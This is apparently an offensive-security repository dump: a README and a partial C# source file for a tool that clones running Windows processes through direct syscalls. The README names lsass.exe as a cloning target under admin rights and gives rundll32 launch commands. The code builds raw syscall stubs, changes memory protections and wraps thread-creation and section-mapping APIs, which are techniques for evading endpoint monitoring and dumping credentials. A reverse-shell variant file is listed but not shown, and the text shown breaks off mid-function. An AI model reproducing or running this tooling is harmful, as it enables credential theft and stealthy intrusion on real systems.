├── README.md ├── CloneProcess.cs └── CloneProcessRevShell.cs /README.md: -------------------------------------------------------------------------------- 1 | # CloneProcess 2 | Clone running process with ZwCreateProcess (syscall) 3 | 4 | Compile as https://github.com/mobdk/compilecs and insert entrypoint 5 | Executing: rundll32 CloneProcess.dll,#1 or rundll32 CloneProcess.dll,DllMain 6 | 7 | Tested on 64 bit Windows 10 build 2004 19041.572 8 | 9 | Cloning non admin process works also, if one like to clone svchost.exe with arguments fx: svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc 10 | 11 | int ProcId = FindTheRightPID("svchost.exe", "PrintWorkflow", "PrintWorkflowUserSvc", ""); FindTheRightPID will return the correct PID 12 | 13 | Cloning admin process like lsass.exe fx: int ProcId = FindTheRightPID("lsass.exe", "", "", ""); rundll32 CloneProcess.dll,#1 must be 14 | running as admin. 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /CloneProcess.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Security; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | using System.Runtime.ConstrainedExecution; 6 | using System.Management; 7 | using System.Security.Principal; 8 | using System.Collections.Generic; 9 | using System.ComponentModel; 10 | using System.Security.Permissions; 11 | using Microsoft.Win32.SafeHandles; 12 | using System.Linq; 13 | using System.Reflection; 14 | using System.Security.AccessControl; 15 | using System.Text; 16 | using System.Threading; 17 | using System.Security.Cryptography; 18 | using System.IO; 19 | 20 | namespace code 21 | { 22 | class Program 23 | { 24 | 25 | public enum NTSTATUS : uint 26 | { 27 | Success = 0x00000000, 28 | Wait0 = 0x00000000, 29 | Wait1 = 0x00000001, 30 | Wait2 = 0x00000002, 31 | Wait3 = 0x00000003, 32 | Wait63 = 0x0000003f, 33 | Abandoned = 0x00000080, 34 | 
AbandonedWait0 = 0x00000080, 35 | AbandonedWait1 = 0x00000081, 36 | AbandonedWait2 = 0x00000082, 37 | AbandonedWait3 = 0x00000083, 38 | AbandonedWait63 = 0x000000bf, 39 | UserApc = 0x000000c0, 40 | KernelApc = 0x00000100, 41 | Alerted = 0x00000101, 42 | Timeout = 0x00000102, 43 | Pending = 0x00000103, 44 | Reparse = 0x00000104, 45 | MoreEntries = 0x00000105, 46 | NotAllAssigned = 0x00000106, 47 | SomeNotMapped = 0x00000107, 48 | OpLockBreakInProgress = 0x00000108, 49 | VolumeMounted = 0x00000109, 50 | RxActCommitted = 0x0000010a, 51 | NotifyCleanup = 0x0000010b, 52 | NotifyEnumDir = 0x0000010c, 53 | NoQuotasForAccount = 0x0000010d, 54 | PrimaryTransportConnectFailed = 0x0000010e, 55 | PageFaultTransition = 0x00000110, 56 | PageFaultDemandZero = 0x00000111, 57 | PageFaultCopyOnWrite = 0x00000112, 58 | PageFaultGuardPage = 0x00000113, 59 | PageFaultPagingFile = 0x00000114, 60 | CrashDump = 0x00000116, 61 | ReparseObject = 0x00000118, 62 | NothingToTerminate = 0x00000122, 63 | ProcessNotInJob = 0x00000123, 64 | ProcessInJob = 0x00000124, 65 | ProcessCloned = 0x00000129, 66 | FileLockedWithOnlyReaders = 0x0000012a, 67 | FileLockedWithWriters = 0x0000012b, 68 | Informational = 0x40000000, 69 | ObjectNameExists = 0x40000000, 70 | ThreadWasSuspended = 0x40000001, 71 | WorkingSetLimitRange = 0x40000002, 72 | ImageNotAtBase = 0x40000003, 73 | RegistryRecovered = 0x40000009, 74 | Warning = 0x80000000, 75 | GuardPageViolation = 0x80000001, 76 | DatatypeMisalignment = 0x80000002, 77 | Breakpoint = 0x80000003, 78 | SingleStep = 0x80000004, 79 | BufferOverflow = 0x80000005, 80 | NoMoreFiles = 0x80000006, 81 | HandlesClosed = 0x8000000a, 82 | PartialCopy = 0x8000000d, 83 | DeviceBusy = 0x80000011, 84 | InvalidEaName = 0x80000013, 85 | EaListInconsistent = 0x80000014, 86 | NoMoreEntries = 0x8000001a, 87 | LongJump = 0x80000026, 88 | DllMightBeInsecure = 0x8000002b, 89 | Error = 0xc0000000, 90 | Unsuccessful = 0xc0000001, 91 | NotImplemented = 0xc0000002, 92 | InvalidInfoClass = 
0xc0000003, 93 | InfoLengthMismatch = 0xc0000004, 94 | AccessViolation = 0xc0000005, 95 | InPageError = 0xc0000006, 96 | PagefileQuota = 0xc0000007, 97 | InvalidHandle = 0xc0000008, 98 | BadInitialStack = 0xc0000009, 99 | BadInitialPc = 0xc000000a, 100 | InvalidCid = 0xc000000b, 101 | TimerNotCanceled = 0xc000000c, 102 | InvalidParameter = 0xc000000d, 103 | NoSuchDevice = 0xc000000e, 104 | NoSuchFile = 0xc000000f, 105 | InvalidDeviceRequest = 0xc0000010, 106 | EndOfFile = 0xc0000011, 107 | WrongVolume = 0xc0000012, 108 | NoMediaInDevice = 0xc0000013, 109 | NoMemory = 0xc0000017, 110 | ConflictingAddresses = 0xc0000018, 111 | NotMappedView = 0xc0000019, 112 | UnableToFreeVm = 0xc000001a, 113 | UnableToDeleteSection = 0xc000001b, 114 | IllegalInstruction = 0xc000001d, 115 | AlreadyCommitted = 0xc0000021, 116 | AccessDenied = 0xc0000022, 117 | BufferTooSmall = 0xc0000023, 118 | ObjectTypeMismatch = 0xc0000024, 119 | NonContinuableException = 0xc0000025, 120 | BadStack = 0xc0000028, 121 | NotLocked = 0xc000002a, 122 | NotCommitted = 0xc000002d, 123 | InvalidParameterMix = 0xc0000030, 124 | ObjectNameInvalid = 0xc0000033, 125 | ObjectNameNotFound = 0xc0000034, 126 | ObjectNameCollision = 0xc0000035, 127 | ObjectPathInvalid = 0xc0000039, 128 | ObjectPathNotFound = 0xc000003a, 129 | ObjectPathSyntaxBad = 0xc000003b, 130 | DataOverrun = 0xc000003c, 131 | DataLate = 0xc000003d, 132 | DataError = 0xc000003e, 133 | CrcError = 0xc000003f, 134 | SectionTooBig = 0xc0000040, 135 | PortConnectionRefused = 0xc0000041, 136 | InvalidPortHandle = 0xc0000042, 137 | SharingViolation = 0xc0000043, 138 | QuotaExceeded = 0xc0000044, 139 | InvalidPageProtection = 0xc0000045, 140 | MutantNotOwned = 0xc0000046, 141 | SemaphoreLimitExceeded = 0xc0000047, 142 | PortAlreadySet = 0xc0000048, 143 | SectionNotImage = 0xc0000049, 144 | SuspendCountExceeded = 0xc000004a, 145 | ThreadIsTerminating = 0xc000004b, 146 | BadWorkingSetLimit = 0xc000004c, 147 | IncompatibleFileMap = 0xc000004d, 148 | 
SectionProtection = 0xc000004e, 149 | EasNotSupported = 0xc000004f, 150 | EaTooLarge = 0xc0000050, 151 | NonExistentEaEntry = 0xc0000051, 152 | NoEasOnFile = 0xc0000052, 153 | EaCorruptError = 0xc0000053, 154 | FileLockConflict = 0xc0000054, 155 | LockNotGranted = 0xc0000055, 156 | DeletePending = 0xc0000056, 157 | CtlFileNotSupported = 0xc0000057, 158 | UnknownRevision = 0xc0000058, 159 | RevisionMismatch = 0xc0000059, 160 | InvalidOwner = 0xc000005a, 161 | InvalidPrimaryGroup = 0xc000005b, 162 | NoImpersonationToken = 0xc000005c, 163 | CantDisableMandatory = 0xc000005d, 164 | NoLogonServers = 0xc000005e, 165 | NoSuchLogonSession = 0xc000005f, 166 | NoSuchPrivilege = 0xc0000060, 167 | PrivilegeNotHeld = 0xc0000061, 168 | InvalidAccountName = 0xc0000062, 169 | UserExists = 0xc0000063, 170 | NoSuchUser = 0xc0000064, 171 | GroupExists = 0xc0000065, 172 | NoSuchGroup = 0xc0000066, 173 | MemberInGroup = 0xc0000067, 174 | MemberNotInGroup = 0xc0000068, 175 | LastAdmin = 0xc0000069, 176 | WrongPassword = 0xc000006a, 177 | IllFormedPassword = 0xc000006b, 178 | PasswordRestriction = 0xc000006c, 179 | LogonFailure = 0xc000006d, 180 | AccountRestriction = 0xc000006e, 181 | InvalidLogonHours = 0xc000006f, 182 | InvalidWorkstation = 0xc0000070, 183 | PasswordExpired = 0xc0000071, 184 | AccountDisabled = 0xc0000072, 185 | NoneMapped = 0xc0000073, 186 | TooManyLuidsRequested = 0xc0000074, 187 | LuidsExhausted = 0xc0000075, 188 | InvalidSubAuthority = 0xc0000076, 189 | InvalidAcl = 0xc0000077, 190 | InvalidSid = 0xc0000078, 191 | InvalidSecurityDescr = 0xc0000079, 192 | ProcedureNotFound = 0xc000007a, 193 | InvalidImageFormat = 0xc000007b, 194 | NoToken = 0xc000007c, 195 | BadInheritanceAcl = 0xc000007d, 196 | RangeNotLocked = 0xc000007e, 197 | DiskFull = 0xc000007f, 198 | ServerDisabled = 0xc0000080, 199 | ServerNotDisabled = 0xc0000081, 200 | TooManyGuidsRequested = 0xc0000082, 201 | GuidsExhausted = 0xc0000083, 202 | InvalidIdAuthority = 0xc0000084, 203 | AgentsExhausted = 
0xc0000085, 204 | InvalidVolumeLabel = 0xc0000086, 205 | SectionNotExtended = 0xc0000087, 206 | NotMappedData = 0xc0000088, 207 | ResourceDataNotFound = 0xc0000089, 208 | ResourceTypeNotFound = 0xc000008a, 209 | ResourceNameNotFound = 0xc000008b, 210 | ArrayBoundsExceeded = 0xc000008c, 211 | FloatDenormalOperand = 0xc000008d, 212 | FloatDivideByZero = 0xc000008e, 213 | FloatInexactResult = 0xc000008f, 214 | FloatInvalidOperation = 0xc0000090, 215 | FloatOverflow = 0xc0000091, 216 | FloatStackCheck = 0xc0000092, 217 | FloatUnderflow = 0xc0000093, 218 | IntegerDivideByZero = 0xc0000094, 219 | IntegerOverflow = 0xc0000095, 220 | PrivilegedInstruction = 0xc0000096, 221 | TooManyPagingFiles = 0xc0000097, 222 | FileInvalid = 0xc0000098, 223 | InstanceNotAvailable = 0xc00000ab, 224 | PipeNotAvailable = 0xc00000ac, 225 | InvalidPipeState = 0xc00000ad, 226 | PipeBusy = 0xc00000ae, 227 | IllegalFunction = 0xc00000af, 228 | PipeDisconnected = 0xc00000b0, 229 | PipeClosing = 0xc00000b1, 230 | PipeConnected = 0xc00000b2, 231 | PipeListening = 0xc00000b3, 232 | InvalidReadMode = 0xc00000b4, 233 | IoTimeout = 0xc00000b5, 234 | FileForcedClosed = 0xc00000b6, 235 | ProfilingNotStarted = 0xc00000b7, 236 | ProfilingNotStopped = 0xc00000b8, 237 | NotSameDevice = 0xc00000d4, 238 | FileRenamed = 0xc00000d5, 239 | CantWait = 0xc00000d8, 240 | PipeEmpty = 0xc00000d9, 241 | CantTerminateSelf = 0xc00000db, 242 | InternalError = 0xc00000e5, 243 | InvalidParameter1 = 0xc00000ef, 244 | InvalidParameter2 = 0xc00000f0, 245 | InvalidParameter3 = 0xc00000f1, 246 | InvalidParameter4 = 0xc00000f2, 247 | InvalidParameter5 = 0xc00000f3, 248 | InvalidParameter6 = 0xc00000f4, 249 | InvalidParameter7 = 0xc00000f5, 250 | InvalidParameter8 = 0xc00000f6, 251 | InvalidParameter9 = 0xc00000f7, 252 | InvalidParameter10 = 0xc00000f8, 253 | InvalidParameter11 = 0xc00000f9, 254 | InvalidParameter12 = 0xc00000fa, 255 | MappedFileSizeZero = 0xc000011e, 256 | TooManyOpenedFiles = 0xc000011f, 257 | Cancelled = 
0xc0000120, 258 | CannotDelete = 0xc0000121, 259 | InvalidComputerName = 0xc0000122, 260 | FileDeleted = 0xc0000123, 261 | SpecialAccount = 0xc0000124, 262 | SpecialGroup = 0xc0000125, 263 | SpecialUser = 0xc0000126, 264 | MembersPrimaryGroup = 0xc0000127, 265 | FileClosed = 0xc0000128, 266 | TooManyThreads = 0xc0000129, 267 | ThreadNotInProcess = 0xc000012a, 268 | TokenAlreadyInUse = 0xc000012b, 269 | PagefileQuotaExceeded = 0xc000012c, 270 | CommitmentLimit = 0xc000012d, 271 | InvalidImageLeFormat = 0xc000012e, 272 | InvalidImageNotMz = 0xc000012f, 273 | InvalidImageProtect = 0xc0000130, 274 | InvalidImageWin16 = 0xc0000131, 275 | LogonServer = 0xc0000132, 276 | DifferenceAtDc = 0xc0000133, 277 | SynchronizationRequired = 0xc0000134, 278 | DllNotFound = 0xc0000135, 279 | IoPrivilegeFailed = 0xc0000137, 280 | OrdinalNotFound = 0xc0000138, 281 | EntryPointNotFound = 0xc0000139, 282 | ControlCExit = 0xc000013a, 283 | PortNotSet = 0xc0000353, 284 | DebuggerInactive = 0xc0000354, 285 | CallbackBypass = 0xc0000503, 286 | PortClosed = 0xc0000700, 287 | MessageLost = 0xc0000701, 288 | InvalidMessage = 0xc0000702, 289 | RequestCanceled = 0xc0000703, 290 | RecursiveDispatch = 0xc0000704, 291 | LpcReceiveBufferExpected = 0xc0000705, 292 | LpcInvalidConnectionUsage = 0xc0000706, 293 | LpcRequestsNotAllowed = 0xc0000707, 294 | ResourceInUse = 0xc0000708, 295 | ProcessIsProtected = 0xc0000712, 296 | VolumeDirty = 0xc0000806, 297 | FileCheckedOut = 0xc0000901, 298 | CheckOutRequired = 0xc0000902, 299 | BadFileType = 0xc0000903, 300 | FileTooLarge = 0xc0000904, 301 | FormsAuthRequired = 0xc0000905, 302 | VirusInfected = 0xc0000906, 303 | VirusDeleted = 0xc0000907, 304 | TransactionalConflict = 0xc0190001, 305 | InvalidTransaction = 0xc0190002, 306 | TransactionNotActive = 0xc0190003, 307 | TmInitializationFailed = 0xc0190004, 308 | RmNotActive = 0xc0190005, 309 | RmMetadataCorrupt = 0xc0190006, 310 | TransactionNotJoined = 0xc0190007, 311 | DirectoryNotRm = 0xc0190008, 312 | 
CouldNotResizeLog = 0xc0190009, 313 | TransactionsUnsupportedRemote = 0xc019000a, 314 | LogResizeInvalidSize = 0xc019000b, 315 | RemoteFileVersionMismatch = 0xc019000c, 316 | CrmProtocolAlreadyExists = 0xc019000f, 317 | TransactionPropagationFailed = 0xc0190010, 318 | CrmProtocolNotFound = 0xc0190011, 319 | TransactionSuperiorExists = 0xc0190012, 320 | TransactionRequestNotValid = 0xc0190013, 321 | TransactionNotRequested = 0xc0190014, 322 | TransactionAlreadyAborted = 0xc0190015, 323 | TransactionAlreadyCommitted = 0xc0190016, 324 | TransactionInvalidMarshallBuffer = 0xc0190017, 325 | CurrentTransactionNotValid = 0xc0190018, 326 | LogGrowthFailed = 0xc0190019, 327 | ObjectNoLongerExists = 0xc0190021, 328 | StreamMiniversionNotFound = 0xc0190022, 329 | StreamMiniversionNotValid = 0xc0190023, 330 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, 331 | CantOpenMiniversionWithModifyIntent = 0xc0190025, 332 | CantCreateMoreStreamMiniversions = 0xc0190026, 333 | HandleNoLongerValid = 0xc0190028, 334 | NoTxfMetadata = 0xc0190029, 335 | LogCorruptionDetected = 0xc0190030, 336 | CantRecoverWithHandleOpen = 0xc0190031, 337 | RmDisconnected = 0xc0190032, 338 | EnlistmentNotSuperior = 0xc0190033, 339 | RecoveryNotNeeded = 0xc0190034, 340 | RmAlreadyStarted = 0xc0190035, 341 | FileIdentityNotPersistent = 0xc0190036, 342 | CantBreakTransactionalDependency = 0xc0190037, 343 | CantCrossRmBoundary = 0xc0190038, 344 | TxfDirNotEmpty = 0xc0190039, 345 | IndoubtTransactionsExist = 0xc019003a, 346 | TmVolatile = 0xc019003b, 347 | RollbackTimerExpired = 0xc019003c, 348 | TxfAttributeCorrupt = 0xc019003d, 349 | EfsNotAllowedInTransaction = 0xc019003e, 350 | TransactionalOpenNotAllowed = 0xc019003f, 351 | TransactedMappingUnsupportedRemote = 0xc0190040, 352 | TxfMetadataAlreadyPresent = 0xc0190041, 353 | TransactionScopeCallbacksNotSet = 0xc0190042, 354 | TransactionRequiredPromotion = 0xc0190043, 355 | CannotExecuteFileInTransaction = 0xc0190044, 356 | 
TransactionsNotFrozen = 0xc0190045, 357 | MaximumNtStatus = 0xffffffff 358 | }; 359 | 360 | 361 | public enum ProcessAccessFlags : uint 362 | { 363 | Terminate = 0x00000001, 364 | CreateThread = 0x00000002, 365 | VMOperation = 0x00000008, 366 | VMRead = 0x00000010, 367 | VMWrite = 0x00000020, 368 | DupHandle = 0x00000040, 369 | SetInformation = 0x00000200, 370 | QueryInformation = 0x00000400, 371 | Synchronize = 0x00100000, 372 | All = 0x001F0FFF 373 | } 374 | 375 | [StructLayout(LayoutKind.Sequential)] 376 | public struct OBJECT_ATTRIBUTES 377 | { 378 | public ulong Length; 379 | public IntPtr RootDirectory; 380 | public IntPtr ObjectName; 381 | public ulong Attributes; 382 | public IntPtr SecurityDescriptor; 383 | public IntPtr SecurityQualityOfService; 384 | } 385 | 386 | [StructLayout(LayoutKind.Sequential)] 387 | public struct SECTION_DATA 388 | { 389 | public Boolean isvalid; 390 | public IntPtr SectionHandle; 391 | public IntPtr pBase; 392 | } 393 | 394 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 395 | public struct OSVERSIONINFOEXW 396 | { 397 | public int dwOSVersionInfoSize; 398 | public int dwMajorVersion; 399 | public int dwMinorVersion; 400 | public int dwBuildNumber; 401 | public int dwPlatformId; 402 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] 403 | public string szCSDVersion; 404 | public UInt16 wServicePackMajor; 405 | public UInt16 wServicePackMinor; 406 | public UInt16 wSuiteMask; 407 | public byte wProductType; 408 | public byte wReserved; 409 | } 410 | 411 | 412 | [Flags] 413 | public enum ACCESS_MASK : uint 414 | { 415 | DELETE = 0x00010000, 416 | READ_CONTROL = 0x00020000, 417 | WRITE_DAC = 0x00040000, 418 | WRITE_OWNER = 0x00080000, 419 | SYNCHRONIZE = 0x00100000, 420 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 421 | STANDARD_RIGHTS_READ = 0x00020000, 422 | STANDARD_RIGHTS_WRITE = 0x00020000, 423 | STANDARD_RIGHTS_EXECUTE = 0x00020000, 424 | STANDARD_RIGHTS_ALL = 0x001F0000, 425 | SPECIFIC_RIGHTS_ALL = 
0x0000FFFF, 426 | ACCESS_SYSTEM_SECURITY = 0x01000000, 427 | MAXIMUM_ALLOWED = 0x02000000, 428 | GENERIC_READ = 0x80000000, 429 | GENERIC_WRITE = 0x40000000, 430 | GENERIC_EXECUTE = 0x20000000, 431 | GENERIC_ALL = 0x10000000, 432 | DESKTOP_READOBJECTS = 0x00000001, 433 | DESKTOP_CREATEWINDOW = 0x00000002, 434 | DESKTOP_CREATEMENU = 0x00000004, 435 | DESKTOP_HOOKCONTROL = 0x00000008, 436 | DESKTOP_JOURNALRECORD = 0x00000010, 437 | DESKTOP_JOURNALPLAYBACK = 0x00000020, 438 | DESKTOP_ENUMERATE = 0x00000040, 439 | DESKTOP_WRITEOBJECTS = 0x00000080, 440 | DESKTOP_SWITCHDESKTOP = 0x00000100, 441 | WINSTA_ENUMDESKTOPS = 0x00000001, 442 | WINSTA_READATTRIBUTES = 0x00000002, 443 | WINSTA_ACCESSCLIPBOARD = 0x00000004, 444 | WINSTA_CREATEDESKTOP = 0x00000008, 445 | WINSTA_WRITEATTRIBUTES = 0x00000010, 446 | WINSTA_ACCESSGLOBALATOMS = 0x00000020, 447 | WINSTA_EXITWINDOWS = 0x00000040, 448 | WINSTA_ENUMERATE = 0x00000100, 449 | WINSTA_READSCREEN = 0x00000200, 450 | WINSTA_ALL_ACCESS = 0x0000037F 451 | } 452 | 453 | [StructLayout(LayoutKind.Sequential)] 454 | public struct CLIENT_ID 455 | { 456 | public IntPtr UniqueProcess; 457 | public IntPtr UniqueThread; 458 | } 459 | 460 | [SuppressUnmanagedCodeSecurity] 461 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 462 | public delegate NTSTATUS ProtectorX(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect ); 463 | public static NTSTATUS Protector(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect) 464 | { 465 | IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "ZwProtectVirtualMemory", false); 466 | ProtectorX ProtectorFunc = (ProtectorX)Marshal.GetDelegateForFunctionPointer(proc, typeof(ProtectorX)); 467 | return (NTSTATUS)ProtectorFunc( ProcessHandle, ref BaseAddress, ref RegionSize, NewProtect, ref OldProtect ); 468 | } 469 | 470 | [SuppressUnmanagedCodeSecurity] 471 | 
[UnmanagedFunctionPointer(CallingConvention.Cdecl)] 472 | public delegate NTSTATUS RtlCreateUserThreadX( IntPtr hProcess, uint lpThreadSecurity, bool bCreateSuspended, uint dwStackZeroBits, IntPtr pStackReserved, IntPtr pStackCommit, IntPtr pStartAddress, IntPtr pStartParameter, out IntPtr hThread, out CLIENT_ID pClientId ); 473 | public static NTSTATUS RtlCreateUserThread( IntPtr hProcess, uint lpThreadSecurity, bool bCreateSuspended, uint dwStackZeroBits, IntPtr pStackReserved, IntPtr pStackCommit, IntPtr pStartAddress, IntPtr pStartParameter, out IntPtr hThread, out CLIENT_ID pClientId ) 474 | { 475 | IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "RtlCreateUserThread", false); 476 | RtlCreateUserThreadX RtlCreateUserThreadXFunc = (RtlCreateUserThreadX)Marshal.GetDelegateForFunctionPointer(proc, typeof(RtlCreateUserThreadX)); 477 | return (NTSTATUS)RtlCreateUserThreadXFunc( hProcess, lpThreadSecurity, bCreateSuspended, dwStackZeroBits, pStackReserved, pStackCommit, pStartAddress, pStartParameter, out hThread, out pClientId ); 478 | } 479 | 480 | 481 | [SuppressUnmanagedCodeSecurity] 482 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 483 | public delegate NTSTATUS ZwProtectVirtualMemoryX(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 lpNumberOfBytesWritten); 484 | public static NTSTATUS ZwProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 lpNumberOfBytesWritten, ref OSVERSIONINFOEXW osVersionInfo) 485 | { 486 | byte [] syscall = GetOSVersionAndReturnSyscall( 16, ref osVersionInfo ); 487 | unsafe 488 | { 489 | fixed (byte* ptr = syscall) 490 | { 491 | IntPtr allocMemAddress = (IntPtr)ptr; 492 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 493 | UInt32 size = (uint)syscall.Length; 494 | IntPtr sizeIntPtr = (IntPtr)size; 495 | UInt32 oldprotect = 0; 496 | Protector( new IntPtr(-1), 
ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect); 497 | ZwProtectVirtualMemoryX ZwProtectVirtualMemoryFunc = (ZwProtectVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwProtectVirtualMemoryX)); 498 | return (NTSTATUS)ZwProtectVirtualMemoryFunc( ProcessHandle, ref BaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten); 499 | } 500 | } 501 | } 502 | 503 | [SuppressUnmanagedCodeSecurity] 504 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 505 | public delegate NTSTATUS ZwCreateSectionX( ref IntPtr section, UInt32 desiredAccess, IntPtr pAttrs, ref long MaximumSize, uint pageProt, uint allocationAttribs, IntPtr hFile ); 506 | public static NTSTATUS ZwCreateSection( ref IntPtr section, UInt32 desiredAccess, IntPtr pAttrs, ref long MaximumSize, uint pageProt, uint allocationAttribs, IntPtr hFile, ref OSVERSIONINFOEXW osVersionInfo ) 507 | { 508 | byte [] syscall = GetOSVersionAndReturnSyscall( 5, ref osVersionInfo ); 509 | unsafe 510 | { 511 | fixed (byte* ptr = syscall) 512 | { 513 | IntPtr allocMemAddress = (IntPtr)ptr; 514 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 515 | UInt32 size = (uint)syscall.Length; 516 | IntPtr sizeIntPtr = (IntPtr)size; 517 | UInt32 oldprotect = 0; 518 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 519 | ZwCreateSectionX ZwCreateSectionFunc = (ZwCreateSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateSectionX)); 520 | return (NTSTATUS)ZwCreateSectionFunc( ref section, desiredAccess, pAttrs, ref MaximumSize, pageProt, allocationAttribs, hFile ); 521 | } 522 | 523 | } 524 | } 525 | 526 | [SuppressUnmanagedCodeSecurity] 527 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 528 | public delegate NTSTATUS ZwMapViewOfSectionX( IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize, ref long 
SectionOffset, ref long ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect ); 529 | public static NTSTATUS ZwMapViewOfSection( IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize, ref long SectionOffset, ref long ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect, ref OSVERSIONINFOEXW osVersionInfo) 530 | { 531 | byte [] syscall = GetOSVersionAndReturnSyscall( 6, ref osVersionInfo ); 532 | unsafe 533 | { 534 | fixed (byte* ptr = syscall) 535 | { 536 | IntPtr allocMemAddress = (IntPtr)ptr; 537 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 538 | UInt32 size = (uint)syscall.Length; 539 | IntPtr sizeIntPtr = (IntPtr)size; 540 | UInt32 oldprotect = 0; 541 | ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 542 | ZwMapViewOfSectionX ZwMapViewOfSectionFunc = (ZwMapViewOfSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwMapViewOfSectionX)); 543 | return (NTSTATUS)ZwMapViewOfSectionFunc( SectionHandle, ProcessHandle, ref BaseAddress, ZeroBits, CommitSize, ref SectionOffset, ref ViewSize, InheritDisposition, AllocationType, Win32Protect ); 544 | } 545 | 546 | } 547 | } 548 | 549 | [SuppressUnmanagedCodeSecurity] 550 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 551 | public delegate NTSTATUS ZwOpenProcessX(ref IntPtr ProcessHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid); 552 | public static NTSTATUS ZwOpenProcess(ref IntPtr ProcessHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid, ref OSVERSIONINFOEXW osVersionInfo) 553 | { 554 | byte [] syscall = GetOSVersionAndReturnSyscall( 1, ref osVersionInfo ); 555 | unsafe 556 | { 557 | fixed (byte* ptr = syscall) 558 | { 559 | IntPtr allocMemAddress = (IntPtr)ptr; 560 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 561 | UInt32 size = 
(uint)syscall.Length; 562 | IntPtr sizeIntPtr = (IntPtr)size; 563 | UInt32 oldprotect = 0; 564 | ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 565 | ZwOpenProcessX ZwOpenProcessFunc = (ZwOpenProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwOpenProcessX)); 566 | return (NTSTATUS)ZwOpenProcessFunc(ref ProcessHandle, processAccess, objAttribute, ref clientid); 567 | } 568 | 569 | } 570 | } 571 | 572 | [SuppressUnmanagedCodeSecurity] 573 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 574 | public delegate NTSTATUS NtCreateThreadExX(out IntPtr threadHandle,uint desiredAccess,IntPtr objectAttributes,IntPtr processHandle,IntPtr lpStartAddress,IntPtr lpParameter,int createSuspended,uint stackZeroBits,uint sizeOfStackCommit,uint sizeOfStackReserve,IntPtr lpBytesBuffer); 575 | public static NTSTATUS ZwCreateThreadEx(out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr lpStartAddress, IntPtr lpParameter, int createSuspended, uint stackZeroBits, uint sizeOfStackCommit, uint sizeOfStackReserve, IntPtr lpBytesBuffer, ref OSVERSIONINFOEXW osVersionInfo) 576 | { 577 | byte [] syscall = GetOSVersionAndReturnSyscall( 2, ref osVersionInfo ); 578 | unsafe 579 | { 580 | fixed (byte* ptr = syscall) 581 | { 582 | IntPtr allocMemAddress = (IntPtr)ptr; 583 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 584 | uint size = (uint)syscall.Length; 585 | IntPtr sizeIntPtr = (IntPtr)size; 586 | UInt32 oldprotect = 0; 587 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 588 | NtCreateThreadExX NtCreateThreadExFunc = (NtCreateThreadExX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(NtCreateThreadExX)); 589 | return (NTSTATUS)NtCreateThreadExFunc(out threadHandle, desiredAccess, objectAttributes, processHandle, lpStartAddress, lpParameter, 
